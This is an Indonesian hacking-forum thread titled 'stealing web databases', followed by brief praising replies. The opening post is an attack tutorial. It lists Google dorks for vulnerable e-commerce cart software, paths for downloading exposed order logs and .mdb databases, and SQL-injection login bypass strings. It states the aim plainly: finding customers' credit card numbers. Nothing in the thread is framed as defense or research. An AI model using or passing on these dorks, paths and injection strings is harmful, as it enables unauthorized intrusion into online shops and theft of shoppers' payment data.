.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 mencuri database web

Go down 
+3
night D. fury
zer03s
cyberarmy
7 posters
PengirimMessage
cyberarmy
Top Nubie
Top Nubie
cyberarmy


Jumlah posting : 26
Points : 31
Reputation : 0
Join date : 30.07.11
Age : 29

mencuri database  web Empty
PostSubyek: mencuri database web   mencuri database  web Icon_minitimeFri Aug 19, 2011 9:42 pm

baik engga usah banyak omong langsung ke tkp aja


google dork : allinurl:store/index.cgi/page=

Bugs : ../admin/files/order.log

Example : [You must be registered and logged in to see this link.]

masukin bugsnya : [You must be registered and logged in to see this link.]

trus copy-paste tuch log'nya di notepad biar gampang di baca

keyword : inurl:"/cart.php?m="

Bugs : Admin

ganti tulisn cart.php?m=view dengan admin

login pake SQl Injection :

username :'or"="

Passwordnya : 'or"="

Keyword : /ashopKart20/"

bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb

example : [You must be registered and logged in to see this link.]

Injection : selanjutnya masukin bugs di atas jadi : [You must be registered and logged in to see this link.]

kalo berhasil loe dapet file beresktension .mdb nach file itu

tmn2 open with MS-Acces

keyword : /shop/category.asp/catid=

Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp

example : [You must be registered and logged in to see this link.]

masukin bugs menjadi : [You must be registered and logged in to see this link.]

trus bug tadi diganti dengan /data/pdshoppro.mdb

kadang ada password adminnya lho

keyword : inurl:"/store/proddetail.asp?prod="

bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb

kita gunakan dari bugs webshop Sunshop

google dork : "Powered by SunShop 3.2"

Atau google dork : inurl:"/sunshop/index.php?action="

Bugs : ganti kata index.php dgn admin

kl ada peringatan java script error klik "OK" aja

Contoh buat kalian : [You must be registered and logged in to see this link.]

ganti dengan admin [You must be registered and logged in to see this link.]

Login pake SQL Injection :

Username : admin

Password :'or''='

Kita gunakan bugs dari webshop Digishop

Google dork : "Powered by Digishop 3.2"

Bugs : hapus tulisan cart.php?m= dengan admin

Login pake SQL Injection :

Username : 'or"="

Password : 'or"="

google dork : inurl:"mall/lobby.asp"

bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb

example : Gem Depot Lobby Page - Search our Inventory

jadi [You must be registered and logged in to see this link.]

dapat dech .mdb ===> trus klik open database

JANGAN klik "convert databese" ===> klk view orders

====> trus cari orang yg pernah belanja contoh pada

customer no 36 trus dimana no CCnya badKiddes....

Mendowload file log order DCShop pada folder orders!

keyword allinurl:/DCShop/

bug: /DCShop/orders/orders.txt atau

/DCShop/Orders/orders.txt

Cari target dahulu Website commerceSQL di google.com,

dengan keyword allinurl:/commercesql/

Misalkan kita mendapat target dg url

[You must be registered and logged in to see this link.] , maka :

Ganti url tsb menjadi -> [You must be registered and logged in to see this link.]

Contoh untuk melihat admin config ->

[You must be registered and logged in to see this link.]

Contoh untuk melihat admin manager ->

[You must be registered and logged in to see this link.]

Sedangkan utk melihat file log/ccnya

-> [You must be registered and logged in to see this link.]

EShop, Mendowload file log order EShop pada folder database!

keyword allinurl:/eshop/

bug: /cg-bin/eshop/database/order.mdb

contoh: [You must be registered and logged in to see this link.]

Cart32 v3.5a, keyword allinurl:/cart32.exe/

exp:http://www.wideopen.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound

menjadi [You must be registered and logged in to see this link.] <-- setelah string /cart32.exe/ ditambah kata error Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses! Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc's! Copy salah satu file .c32 yg ada atau semuanya ke notepad Ganti string url tsb. menjadi seperti ini : [You must be registered and logged in to see this link.] <-- dimana string .exe dihapus/dihilangkan! Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format [You must be registered and logged in to see this link.]

Contoh [You must be registered and logged in to see this link.]

VP-ASP Shopping Cart 5.0 Cara II

SQL Injection vulnerability pada script 'shopdisplayproducts.asp'

keyword allinurl:/vpasp/shopdisplayproducts.asp

Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp

[You must be registered and logged in to see this link.]

GantiĀ²lah nilai dari string url terakhir dg:

%20'a%25'--

%20'b%25'--

%20'c%25'--

dst...
Kembali Ke Atas Go down
zer03s
Administrator
Administrator
zer03s


Jumlah posting : 2471
Points : 4119
Reputation : 113
Join date : 13.12.10
Age : 32
Lokasi : /home/root/blackc0de

mencuri database  web Empty
PostSubyek: Re: mencuri database web   mencuri database  web Icon_minitimeWed Aug 24, 2011 4:28 pm

thanks om tutornya :jempol
Kembali Ke Atas Go down
http://zer03s.blog.com/
night D. fury
larva
larva
night D. fury


Jumlah posting : 284
Points : 311
Reputation : 5
Join date : 05.07.11
Age : 34
Lokasi : Tanah nenek & kakek moyang

mencuri database  web Empty
PostSubyek: Re: mencuri database web   mencuri database  web Icon_minitimeFri Sep 09, 2011 3:19 pm

karen om mencuri database  web 3529815765
Kembali Ke Atas Go down
bumiayucyber
Newbie - Hack
Newbie - Hack
bumiayucyber


Jumlah posting : 379
Points : 422
Reputation : 9
Join date : 08.09.11

mencuri database  web Empty
PostSubyek: Re: mencuri database web   mencuri database  web Icon_minitimeSat Sep 10, 2011 9:32 am

keren om,ijn nyoba ya,kli aja berguna
Kembali Ke Atas Go down
c4p1t4n
Global Mod
Global Mod
c4p1t4n


Jumlah posting : 461
Points : 532
Reputation : 42
Join date : 26.01.11
Age : 31
Lokasi : not found

mencuri database  web Empty
PostSubyek: Re: mencuri database web   mencuri database  web Icon_minitimeSat Sep 10, 2011 8:19 pm

nice tutor cobain..... mencuri database  web 4106595937 mencuri database  web 271371
Kembali Ke Atas Go down
Tuan DC
BC Security
BC Security
Tuan DC


Jumlah posting : 623
Points : 704
Reputation : 41
Join date : 11.08.11
Lokasi : in the Hell

mencuri database  web Empty
PostSubyek: Re: mencuri database web   mencuri database  web Icon_minitimeSun Sep 11, 2011 8:30 am

nice tutor oms.. :boss: :boss:
Kembali Ke Atas Go down
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

mencuri database  web Empty
PostSubyek: Re: mencuri database web   mencuri database  web Icon_minitimeSun Sep 11, 2011 9:01 am

huwewewewe,sikat dulu gan mantab nih turtol
Kembali Ke Atas Go down
http://aljinet.blogspot.com
Sponsored content





mencuri database  web Empty
PostSubyek: Re: mencuri database web   mencuri database  web Icon_minitime

Kembali Ke Atas Go down
 
mencuri database web
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Dumping database
» Aplikasi Database VB6
» App Database.. Mhon bntuannya
» buku oracle database
» KUMPULAN APLIKASI DATABASE

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Web attack-
Navigasi: